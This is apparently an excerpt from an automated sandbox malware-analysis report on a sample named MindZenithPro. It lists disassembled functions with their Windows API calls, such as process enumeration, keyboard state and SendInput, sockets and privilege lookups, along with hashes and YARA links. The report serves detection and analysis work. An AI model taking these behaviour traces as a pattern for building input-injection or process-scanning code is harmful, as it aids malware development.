                                    • API String ID: 1998397398-0
                                    • Opcode ID: c051a28f8e02798c25cee63bb9b4e1ad8a440d974f435de53831b326905c1fb8
                                    • Instruction ID: c837901bc796f79349e7681affeae15a9ac9dcaa4e4a9cc9cae968ac4aaa59d7
                                    • Opcode Fuzzy Hash: c051a28f8e02798c25cee63bb9b4e1ad8a440d974f435de53831b326905c1fb8
                                    • Instruction Fuzzy Hash: 34A127766047109FDB05DF68C485A2AB7E5FF88714F04845EF98A9B362CB34EE01CB96
                                    Function 00420ABD Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00460BF0,?), ref: 00420C77
                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00460BF0,?), ref: 00420C8F
                                    • CLSIDFromProgID.OLE32(?,?,00000000,0045DC2C,000000FF,?,00000000,00000800,00000000,?,00460BF0,?), ref: 00420CB4
                                    • _memcmp.LIBVCRUNTIME ref: 00420CD5
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    • Opcode ID: b731343ff99cbe7bc06dec9bf4da719e3e424a6c88b088ce44313e527a33ee70
                                    • Instruction ID: 2189541384e702e7ec64a073dc321ee5838955fec851b05e8cc3624822264ff2
                                    • Opcode Fuzzy Hash: b731343ff99cbe7bc06dec9bf4da719e3e424a6c88b088ce44313e527a33ee70
                                    • Instruction Fuzzy Hash: 88813771A00219EFCB04DF94C888EEEB7B9FF89305F204559E506AB251DB75AE06CB60
                                    Function 0044AE03 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0044AE33
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0044AE41
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0044AF23
                                    • CloseHandle.KERNEL32(00000000), ref: 0044AF32
                                      • Part of subcall function 003DE224: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00403B5C,?), ref: 003DE24E
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                    • String ID:
                                    • API String ID: 1991900642-0
                                    • Opcode ID: 73cda0fd086ce9e74b9d6a25eb05617060ae464d3988e584e7b16fc2dd1b30dc
                                    • Instruction ID: 81112377f07694f894ec7f8a93d1b41ba673abdfc755c57110b67404f2c32932
                                    • Opcode Fuzzy Hash: 73cda0fd086ce9e74b9d6a25eb05617060ae464d3988e584e7b16fc2dd1b30dc
                                    • Instruction Fuzzy Hash: D751F7B15087019FD311EF24D886A5BBBE8EF89714F40892EF985D7291EB34E904CB96
                                    Function 004016E1 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: a12f6ba513cc22da3fe69499ff614f4e31eb7c2b2e85c20094ce26407780dc1d
                                    • Instruction ID: a154c2e53c0ad912ca3d352cd5884eed3559bc187c7419d94b92d3cfbc9e45b5
                                    • Opcode Fuzzy Hash: a12f6ba513cc22da3fe69499ff614f4e31eb7c2b2e85c20094ce26407780dc1d
                                    • Instruction Fuzzy Hash: D3410A32A00604ABDB227E798C41A7F3BA5EF46770F144677F914FB2E1D6384945836A
                                    Function 0044225D Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00442284
                                    • WSAGetLastError.WSOCK32 ref: 00442292
                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00442311
                                    • WSAGetLastError.WSOCK32 ref: 0044231B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorLast$socket
                                    • String ID:
                                    • API String ID: 1881357543-0
                                    • Opcode ID: a6348b4011a04c0ac3ba6d5e8441b001ea83435dc590ff9b4983bb67080a2ffc
                                    • Instruction ID: 18952d86ff43558cc61c620a2e85450d426ce6615fe59f72159674830cadbf0d
                                    • Opcode Fuzzy Hash: a6348b4011a04c0ac3ba6d5e8441b001ea83435dc590ff9b4983bb67080a2ffc
                                    • Instruction Fuzzy Hash: 0641CE35600700AFE721AF64C886F2A77A5AF04708F54809DF95A9F3D3D7B6ED428B90
                                    Function 004569D1 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00456A3B
                                    • ScreenToClient.USER32(?,?), ref: 00456A6E
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00456ADB
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 2f19dac3827a802a7ef09939a2542005e62945b62c17304d55aaffdd09d5ed8c
                                    • Instruction ID: 7c247432a6e6f712be824611414f2ee176dafb513b3751dddac66c6b77c3bc01
                                    • Opcode Fuzzy Hash: 2f19dac3827a802a7ef09939a2542005e62945b62c17304d55aaffdd09d5ed8c
                                    • Instruction Fuzzy Hash: D3515C70A00209AFCF20CF64C980AAE7BB6FF55322F51816AFD159B391D774AD45CB94
                                    Function 003FB76F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e02798c1e15a8592aabd72984cc4b38bbb2ef9534fe5a2ea459c21dd00d54f12
                                    • Instruction ID: 81cfce1a17ee1746136a2aa4bb9622f544f6020532dcd81d183129faca02f69e
                                    • Opcode Fuzzy Hash: e02798c1e15a8592aabd72984cc4b38bbb2ef9534fe5a2ea459c21dd00d54f12
                                    • Instruction Fuzzy Hash: E741D6B1A00748AFD726AF38CC41B7AFBA9EF88710F10856EF651DF681D77599058B80
                                    Function 0042B158 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0042B1AD
                                    • SetKeyboardState.USER32(00000080), ref: 0042B1C9
                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0042B237
                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0042B289
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 8ecf5a1472a994380d9a576f6d7028db012bff34ed4ad6de800646e7ca8ee304
                                    • Instruction ID: c8e763ed6e979e8d26b5b0b07500a7a7ec06ac527a625136730ced2d72e5667b
                                    • Opcode Fuzzy Hash: 8ecf5a1472a994380d9a576f6d7028db012bff34ed4ad6de800646e7ca8ee304
                                    • Instruction Fuzzy Hash: F0312930B00368AEEB30CB24A8097FFB7A5EF55310F84465BE480912D1C77C898187FA
                                    Function 00455A81 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00455B12
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00455B35
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00455B42
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00455B68
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: LongWindow$InvalidateMessageRectSend
                                    • String ID:
                                    • API String ID: 3340791633-0
                                    • Opcode ID: cba9d6a53a5d0534257f913a9a8afe18195e75b9958887b4508e3ba820ae78f7
                                    • Instruction ID: 2c0e7c6b45872663d9ac4e15b04a7b009ee76a838ae3d424c1839a02a5d19295
                                    • Opcode Fuzzy Hash: cba9d6a53a5d0534257f913a9a8afe18195e75b9958887b4508e3ba820ae78f7
                                    • Instruction Fuzzy Hash: 8E31A134A51A08BFEF309E54CC69BFA3761AB04312F144113FE11962E3C678AD89D74A
                                    Function 0042B29D Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0042B2F2
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 0042B30E
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 0042B375
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0042B3C7
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 82a59fa8d7b8f3a84411f3756b7ced302dfbaa8da8a07f014a6fbfa10cf5ada2
                                    • Instruction ID: b619b6f085cda14f4633533501e4747d2544327c214e0dfadd14bc365b92f61a
                                    • Opcode Fuzzy Hash: 82a59fa8d7b8f3a84411f3756b7ced302dfbaa8da8a07f014a6fbfa10cf5ada2
                                    • Instruction Fuzzy Hash: 6431F370B00368AEEF20CA65A8047BB7BA5EF45310F84421BE885922D1C37C89919BDA
                                    Function 0042E5D6 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C3914: _wcslen.LIBCMT ref: 003C3919
                                    • _wcslen.LIBCMT ref: 0042E60C
                                    • _wcslen.LIBCMT ref: 0042E623
                                    • _wcslen.LIBCMT ref: 0042E64E
                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0042E659
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$ExtentPoint32Text
                                    • String ID:
                                    • API String ID: 3763101759-0
                                    • Opcode ID: f4e2d4ab5467d26bbea9afd663a782b69327c790b0f80e903ce21e8289498b27
                                    • Instruction ID: 69e559c089fcadb4832b8a491ef432ad92527a1eb43373aa58116c32483e4757
                                    • Opcode Fuzzy Hash: f4e2d4ab5467d26bbea9afd663a782b69327c790b0f80e903ce21e8289498b27
                                    • Instruction Fuzzy Hash: 9621F371A00224EFCB119FA9D982BAEB7F8EF55710F604166E804BF381D6749E418BA5
                                    Function 004596B5 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • GetCursorPos.USER32(?), ref: 004596ED
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00417D21,?,?,?,?,?), ref: 00459702
                                    • GetCursorPos.USER32(?), ref: 0045974A
                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00417D21,?,?,?), ref: 00459780
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                    • String ID:
                                    • API String ID: 2864067406-0
                                    • Opcode ID: 49941947af98663f249810cb118e9af137f9a819548cbdca5ff1ab2c671dfbe8
                                    • Instruction ID: 97bae7f160c81b1024642530914ce91246da4112bbbded092be53d520e6e5ff1
                                    • Opcode Fuzzy Hash: 49941947af98663f249810cb118e9af137f9a819548cbdca5ff1ab2c671dfbe8
                                    • Instruction Fuzzy Hash: 1A21CA35610218FFCF259F94C848EAB3BB9EB09312F044167FA058B262C3389D50DB64
                                    Function 0042D8A6 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNEL32(?,0045DB28), ref: 0042D8E0
                                    • GetLastError.KERNEL32 ref: 0042D8EF
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0042D8FE
                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0045DB28), ref: 0042D95B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                    • String ID:
                                    • API String ID: 2267087916-0
                                    • Opcode ID: e273144553ff114728aef104d10bbd41dd5c8a4e8122887e941414dd7b5c7553
                                    • Instruction ID: fab3d5e2bb05507424b62229b31aed523f0f64fc22552fcd419565744139f6c6
                                    • Opcode Fuzzy Hash: e273144553ff114728aef104d10bbd41dd5c8a4e8122887e941414dd7b5c7553
                                    • Instruction Fuzzy Hash: A721D6B0A083118F8310DF28D88495F77E4AF16359F504A5EF499C72A1D734DD86CB47
                                    Function 00421C53 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004216F6: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0042170C
                                      • Part of subcall function 004216F6: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00421718
                                      • Part of subcall function 004216F6: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00421727
                                      • Part of subcall function 004216F6: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0042172E
                                      • Part of subcall function 004216F6: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00421744
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00421CA0
                                    • _memcmp.LIBVCRUNTIME ref: 00421CC3
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00421CF9
                                    • HeapFree.KERNEL32(00000000), ref: 00421D00
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 1592001646-0
                                    • Opcode ID: 5da025fa37dfc1042f75c8c1361823098e34795cb0a173bce8437ca892d3cdd6
                                    • Instruction ID: 33d08d2083639d74cba8eca09a557a7e524a7b75344601872f1dc7f9af35d455
                                    • Opcode Fuzzy Hash: 5da025fa37dfc1042f75c8c1361823098e34795cb0a173bce8437ca892d3cdd6
                                    • Instruction Fuzzy Hash: 4521CF71E40228EFCB10CFA9D944BEEB7B8FF50305F44405AE841AB261D774AA05CB98
                                    Function 00452F40 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 00452FC8
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00452FE2
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00452FF0
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00452FFE
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    • Opcode ID: a63bd1986aeee8d59bcdfd82973ef8dd555bc5e298889273d8177c6bd961046e
                                    • Instruction ID: 141a9d32e66dff4d121b0e15b2d149c254f4ba804ebd2ad35986df9b15893be9
                                    • Opcode Fuzzy Hash: a63bd1986aeee8d59bcdfd82973ef8dd555bc5e298889273d8177c6bd961046e
                                    • Instruction Fuzzy Hash: 7A213631604610AFD7149F14C854F6ABBA9EF8632AF14815EF826CB2D3C7B5EC46CB94
                                    Function 00422109 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00422129
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0042213B
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00422151
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0042216C
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: cae05c5b5292c9f5746d352b0ab82b48d713a6012863ad65d23e7de123249134
                                    • Instruction ID: b0ca822a18de33b5cdd2d3b7ac9bc4ca74e07e7c4717857fdc8210b7cd36462d
                                    • Opcode Fuzzy Hash: cae05c5b5292c9f5746d352b0ab82b48d713a6012863ad65d23e7de123249134
                                    • Instruction Fuzzy Hash: E9113C36A00228FFDF119BA4CD85FADBB78FB08750F200092EA01B7290D7716E11DB94
                                    Function 0045A5DF Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • GetClientRect.USER32(?,?), ref: 0045A61D
                                    • GetCursorPos.USER32(?), ref: 0045A627
                                    • ScreenToClient.USER32(?,?), ref: 0045A632
                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 0045A666
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Client$CursorLongProcRectScreenWindow
                                    • String ID:
                                    • API String ID: 4127811313-0
